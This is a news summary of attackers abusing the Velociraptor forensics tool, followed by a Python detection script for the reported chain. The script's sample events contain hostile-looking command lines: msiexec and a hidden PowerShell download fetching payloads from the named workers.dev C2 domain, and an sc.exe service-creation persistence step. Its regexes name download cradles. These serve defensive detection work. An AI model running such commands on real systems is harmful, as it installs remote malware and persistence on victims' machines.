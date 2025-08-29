Velociraptor, an open-source digital forensics and incident response tool, has been abused by attackers to gain remote access to a targeted network, GBHackers News reports. According to an analysis from Sophos' Counter Threat Unit (CTU), the threat actors used the Windows msiexec utility to fetch and run an MSI installer hosted on a Cloudflare Workers domain, and that installer deployed Velociraptor. The Velociraptor client was configured to communicate with the command-and-control domain 'velo[.]qaubctgg[.]workers[.]dev'. The attackers then used a PowerShell command to download Visual Studio Code, installed another executable for persistence, and invoked msiexec again to download further malware.

Sophos CTU researchers said that unauthorized Velociraptor deployments have been a precursor to ransomware, so organizations should watch for suspicious tunneling activity and unexpected service installations and should run endpoint detection and response (EDR) tooling so such activity can be investigated. Because Velociraptor is a legitimate, widely deployed tool, detection has to key on context rather than on the binary itself: an installation no one on the security team authorized, or a client configured to talk to a server the organization does not operate. Organizations are also urged to apply least-privilege principles and maintain robust backups to limit the impact of an intrusion.
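The following is an added detection example, not code from the GBHackers or Sophos write-up. It runs simple checks for the process-creation patterns described above (msiexec installing from a URL, a PowerShell download cradle, an ad hoc service installation, and any reference to a *.workers.dev host) over a handful of constructed Windows process-creation events, and checks a constructed Velociraptor client config for server URLs outside an allowlist. The event field names are assumed and modeled on Sysmon Event ID 1; the allowlisted server name, hostnames, file paths and service names are made up, and only the C2 domain comes from the report.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Velociraptor servers the organization actually operates. Hypothetical value
# for this example; a client configured for any other server is a finding.
APPROVED_VELOCIRAPTOR_SERVERS = {"velo.corp.example"}

URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer"
    r"|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
SERVICE_INSTALL_RE = re.compile(
    r"\bsc(?:\.exe)?\s+create\b|\bnew-service\b|\bservice\s+install\b",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record; field names modeled on Sysmon Event ID 1."""
    host: str
    image: str          # full path of the created process
    command_line: str
    parent_image: str


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcessEvent) -> list[str]:
    """Return one finding string per suspicious pattern the event matches."""
    findings = []
    name = image_name(ev.image)
    cmd = ev.command_line
    hosts = [h.lower() for h in URL_RE.findall(cmd)]

    # msiexec installing a package directly from a URL: the first step reported.
    # Managed deployments install MSIs from file shares or management tooling.
    if name == "msiexec.exe" and hosts:
        findings.append(f"msiexec remote package install from {hosts[0]}")

    # PowerShell download cradle: how Visual Studio Code was fetched.
    if name in ("powershell.exe", "pwsh.exe") and hosts and DOWNLOAD_RE.search(cmd):
        findings.append(f"PowerShell download from {hosts[0]}")

    # Service installation from an ad hoc parent: the persistence step.
    if SERVICE_INSTALL_RE.search(cmd):
        findings.append(f"service installation via {image_name(ev.parent_image)}: {cmd[:60]}")

    # Any *.workers.dev host in a command line: the infrastructure class the
    # reported C2 used and one rarely seen in legitimate admin tooling.
    if any(h.endswith(".workers.dev") for h in hosts):
        findings.append("Cloudflare Workers domain referenced in command line")
    return findings


def triage(events: Iterable[ProcessEvent]) -> dict[str, list[str]]:
    """Group findings by host so an analyst sees the whole chain per endpoint."""
    by_host: dict[str, list[str]] = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            by_host.setdefault(ev.host, []).extend(hits)
    return by_host


def rogue_velociraptor_servers(client_config: str) -> list[str]:
    """Hosts in a Velociraptor client config's server_urls that are not approved."""
    hosts = [h.lower() for h in URL_RE.findall(client_config)]
    return [h for h in hosts if h not in APPROVED_VELOCIRAPTOR_SERVERS]


# Constructed sample events: WS01 replays the reported chain, WS02 is benign.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i https://velo.qaubctgg.workers.dev/setup.msi /qn",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell -nop -w hidden -c "Invoke-WebRequest https://velo.qaubctgg.workers.dev/code.exe -OutFile C:\Users\Public\code.exe"',
                 r"C:\Program Files\Velociraptor\velociraptor.exe"),
    ProcessEvent("WS01", r"C:\Windows\System32\sc.exe",
                 r"sc.exe create UpdaterSvc binPath= C:\Users\Public\svc.exe start= auto",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS02", r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i \\fileserver\deploy\7zip.msi /qn",
                 r"C:\Windows\CCM\CcmExec.exe"),
    ProcessEvent("WS02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -c Get-Service",
                 r"C:\Windows\explorer.exe"),
]

# Constructed client config in Velociraptor's YAML layout, pointing at the
# C2 domain named in the report.
SAMPLE_CLIENT_CONFIG = """\
Client:
  server_urls:
  - https://velo.qaubctgg.workers.dev/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
"""

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host)
        for hit in hits:
            print("  -", hit)
    print("rogue Velociraptor servers:", rogue_velociraptor_servers(SAMPLE_CLIENT_CONFIG))
```

Run stand-alone, the script reports five findings for WS01 and none for WS02, and flags the Workers domain in the client config. The point of grouping by host is that no single event here is conclusive (msiexec, PowerShell and sc.exe are all legitimate), but the sequence on one endpoint is the chain the report describes; in production the same checks would be fed from EDR telemetry rather than a list of constructed records.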
